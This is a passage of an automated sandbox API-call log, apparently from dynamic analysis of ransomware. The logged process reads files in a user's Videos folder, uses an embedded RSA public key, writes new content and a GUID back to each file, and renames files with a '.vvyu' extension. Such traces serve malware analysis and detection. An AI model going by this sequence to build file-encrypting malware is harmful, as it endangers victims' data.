Size=0x210) returned 0x2ea6a68 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0200.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f858 | out: hHeap=0x620000) returned 1 [0200.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.162] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x15de, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x15de, lpOverlapped=0x0) returned 1 [0200.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0200.163] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x15e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.163] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0200.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0200.165] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.165] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.165] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.166] CloseHandle (hObject=0x510) returned 1 [0200.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0200.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0200.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0200.167] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\g5znGT5HlbHq.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\g5zngt5hlbhq.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\g5znGT5HlbHq.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\g5zngt5hlbhq.mkv.vvyu")) returned 1 [0200.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.169] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0200.172] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd3396a0, ftCreationTime.dwHighDateTime=0x1d89e44, ftLastAccessTime.dwLowDateTime=0xcb34200, ftLastAccessTime.dwHighDateTime=0x1d8a1fa, ftLastWriteTime.dwLowDateTime=0xcb34200, ftLastWriteTime.dwHighDateTime=0x1d8a1fa, nFileSizeHigh=0x0, nFileSizeLow=0x1259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kYxGt6chL81vzY.avi", cAlternateFileName="KYXGT6~1.AVI")) returned 1 [0200.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0200.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.173] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\kYxGt6chL81vzY.avi") returned=".avi" [0200.173] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\kYxGt6chL81vzY.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\kyxgt6chl81vzy.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.174] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=4697) returned 1 [0200.174] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.177] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1233, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.177] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.180] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.180] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1259, lpOverlapped=0x0) returned 1 [0200.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.181] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.181] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0200.182] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.182] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.182] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.182] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.182] GetLastError () returned 0x0 [0200.182] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0200.182] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0200.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.183] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.183] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.183] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1260) returned 0x2e902a0 [0200.183] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f858 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f8a0 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.184] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0200.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0200.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32d8 [0200.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea32c0 [0200.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0200.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0200.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0200.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0200.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0200.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0200.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0200.187] GetCurrentThreadId () returned 0x66c [0200.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7db8 [0200.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0200.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.188] GetCurrentThreadId () returned 0x66c [0200.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3320 [0200.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0200.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0200.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32d8 [0200.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0200.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0200.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3338 [0200.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0200.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3350 [0200.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32f0 [0200.191] HeapFree (in: 